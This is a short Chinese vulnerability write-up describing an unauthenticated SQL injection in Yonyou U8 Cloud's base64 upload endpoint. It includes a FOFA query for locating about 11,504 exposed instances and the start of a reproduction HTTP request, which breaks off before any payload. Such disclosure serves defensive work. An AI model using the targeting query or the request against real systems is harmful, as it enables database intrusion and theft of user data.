简介
用友U8Cloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实现数字化转型和云端化管理。
漏洞描述
用友U8 Cloud base64接口处存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
Fofa语法与漏洞编号
FOFA:
app="用友-U8-Cloud"影响资产数量:11,504
CNVD漏洞编号:未知
影响版本
U8cloud所有版本
漏洞复现
GET /u8cloud/api/file/upload/base64 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS